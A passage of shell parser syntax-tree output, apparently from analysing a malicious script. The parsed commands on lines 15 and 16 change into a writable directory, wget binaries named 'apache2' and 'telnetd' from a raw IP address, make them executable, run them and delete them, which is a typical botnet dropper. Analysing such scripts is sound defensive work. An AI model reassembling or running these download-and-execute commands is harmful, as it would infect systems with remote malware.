    WordNode(lineno=15, pos=(1644, 1646), word='cd'),
    WordNode(lineno=15, pos=(1647, 1651), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1652, 1654)),
  CommandNode(lineno=15, pos=(1655, 1663), parts=[
    WordNode(lineno=15, pos=(1655, 1657), word='cd'),
    WordNode(lineno=15, pos=(1658, 1663), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1664, 1666)),
  CommandNode(lineno=15, pos=(1667, 1671), parts=[
    WordNode(lineno=15, pos=(1667, 1669), word='cd'),
    WordNode(lineno=15, pos=(1670, 1671), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1671, 1672)),
  CommandNode(lineno=15, pos=(1673, 1706), parts=[
    WordNode(lineno=15, pos=(1673, 1677), word='wget'),
    WordNode(lineno=15, pos=(1678, 1706), word='http://69.30.215.130/apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1706, 1707)),
  CommandNode(lineno=15, pos=(1708, 1724), parts=[
    WordNode(lineno=15, pos=(1708, 1713), word='chmod'),
    WordNode(lineno=15, pos=(1714, 1716), word='+x'),
    WordNode(lineno=15, pos=(1717, 1724), word='apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1724, 1725)),
  CommandNode(lineno=15, pos=(1726, 1735), parts=[
    WordNode(lineno=15, pos=(1726, 1735), word='./apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1735, 1736)),
  CommandNode(lineno=15, pos=(1737, 1751), parts=[
    WordNode(lineno=15, pos=(1737, 1739), word='rm'),
    WordNode(lineno=15, pos=(1740, 1743), word='-rf'),
    WordNode(lineno=15, pos=(1744, 1751), word='apache2'),
  ]),
])
ListNode(lineno=16, pos=(1752, 1885), parts=[
  CommandNode(lineno=16, pos=(1752, 1759), parts=[
    WordNode(lineno=16, pos=(1752, 1754), word='cd'),
    WordNode(lineno=16, pos=(1755, 1759), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1760, 1762)),
  CommandNode(lineno=16, pos=(1763, 1774), parts=[
    WordNode(lineno=16, pos=(1763, 1765), word='cd'),
    WordNode(lineno=16, pos=(1766, 1774), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1775, 1777)),
  CommandNode(lineno=16, pos=(1778, 1785), parts=[
    WordNode(lineno=16, pos=(1778, 1780), word='cd'),
    WordNode(lineno=16, pos=(1781, 1785), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1786, 1788)),
  CommandNode(lineno=16, pos=(1789, 1797), parts=[
    WordNode(lineno=16, pos=(1789, 1791), word='cd'),
    WordNode(lineno=16, pos=(1792, 1797), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1798, 1800)),
  CommandNode(lineno=16, pos=(1801, 1805), parts=[
    WordNode(lineno=16, pos=(1801, 1803), word='cd'),
    WordNode(lineno=16, pos=(1804, 1805), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1805, 1806)),
  CommandNode(lineno=16, pos=(1807, 1840), parts=[
    WordNode(lineno=16, pos=(1807, 1811), word='wget'),
    WordNode(lineno=16, pos=(1812, 1840), word='http://69.30.215.130/telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1840, 1841)),
  CommandNode(lineno=16, pos=(1842, 1858), parts=[
    WordNode(lineno=16, pos=(1842, 1847), word='chmod'),
    WordNode(lineno=16, pos=(1848, 1850), word='+x'),
    WordNode(lineno=16, pos=(1851, 1858), word='telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1858, 1859)),
  CommandNode(lineno=16, pos=(1860, 1869), parts=[
    WordNode(lineno=16, pos=(1860, 1869), word='./telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1869, 1870)),
  CommandNode(lineno=16, pos=(1871, 1885), parts=[
    WordNode(lineno=16, pos=(1871, 1873), word='rm'),
    WordNode(lineno=16, pos=(1874, 1877), word='-rf'),
    WordNode(lineno=16, pos=(1878, 1885), word='telnetd'),
  ]),
])
